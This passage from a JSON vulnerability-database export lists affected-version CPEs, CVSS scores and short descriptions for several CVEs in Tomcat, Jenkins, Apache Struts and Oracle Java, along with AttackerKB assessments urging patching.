"cpe:2.3:a:apache:tomcat:8.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m9:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m3:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.72:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m8:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.70:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.64:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.69:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m4:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m7:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.71:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.65:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m11:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.68:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.59:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m6:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.67:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.26:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:52:19", "description": "The Fingerprints pages in Jenkins before 1.638 and LTS before 1.625.2 might allow remote attackers to obtain sensitive job and build name information via a direct request.", "cvss3": {}, "published": "2015-11-25T20:59:00", "type": "cve", "title": "CVE-2015-5317", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317"], "modified": "2019-12-17T17:41:00", "cpe": ["cpe:/a:redhat:openshift:2.0", "cpe:/a:jenkins:jenkins:1.625.1", "cpe:/a:redhat:openshift:3.1", "cpe:/a:jenkins:jenkins:1.637"], "id": "CVE-2015-5317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5317", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:1.637:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:1.625.1:*:*:*:lts:*:*:*", "cpe:2.3:a:redhat:openshift:3.1:*:*:*:enterprise:*:*:*", "cpe:2.3:a:redhat:openshift:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:30:31", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "cve", "title": "CVE-2017-5638", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-11-07T02:49:00", "cpe": ["cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.3.27", "cpe:/a:apache:struts:2.3.31", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.5.7", "cpe:/a:apache:struts:2.5.5", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.5.6", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.5.3", "cpe:/a:apache:struts:2.3.24.1", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.3.24.3", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.5.8", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.3.24.2", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.5.2", "cpe:/a:apache:struts:2.5.1", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.5.10", "cpe:/a:apache:struts:2.3.30", "cpe:/a:apache:struts:2.5.9", "cpe:/a:apache:struts:2.3.29", "cpe:/a:apache:struts:2.5.4", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.26", "cpe:/a:apache:struts:2.3.6", "cpe:/a:apache:struts:2.3.25", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.3.9"], "id": "CVE-2017-5638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:25:49", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T11:00:00", "type": "cve", "title": "CVE-2016-3427", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-11-07T02:32:00", "cpe": ["cpe:/a:oracle:jre:1.6.0", "cpe:/a:oracle:jdk:1.8.0", "cpe:/a:oracle:jre:1.7.0", "cpe:/a:oracle:jre:1.8.0", "cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jdk:1.6.0", "cpe:/a:oracle:jrockit:r28.3.9"], "id": "CVE-2016-3427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.7.0:update99:*:*:*:*:*:*", "cpe:2.3:a:oracle:jrockit:r28.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.8.0:update77:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update113:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update113:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update99:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.8.0:update77:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-10-25T18:06:08", "description": "Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn\u2019t updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-06T00:00:00", "type": "attackerkb", "title": "CVE-2016-8735", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2023-10-05T00:00:00", "id": "AKB:D91AE5D0-67DF-4E98-925D-B730FC5F2045", "href": "https://attackerkb.com/topics/Q1ZmV2ey2C/cve-2016-8735", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-25T18:06:41", "description": "The Fingerprints pages in Jenkins before 1.638 and LTS before 1.625.2 might allow remote attackers to obtain sensitive job and build name information via a direct request.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-11-25T00:00:00", "type": "attackerkb", "title": "CVE-2015-5317", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317"], "modified": "2023-10-05T00:00:00", "id": "AKB:EB419F1B-B3C6-4300-B170-275E56122407", "href": "https://attackerkb.com/topics/ok7LuoesLB/cve-2015-5317", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-10-18T16:42:46", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-10-05T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-25T18:06:10", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T00:00:00", "type": "attackerkb", "title": "CVE-2016-3427", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 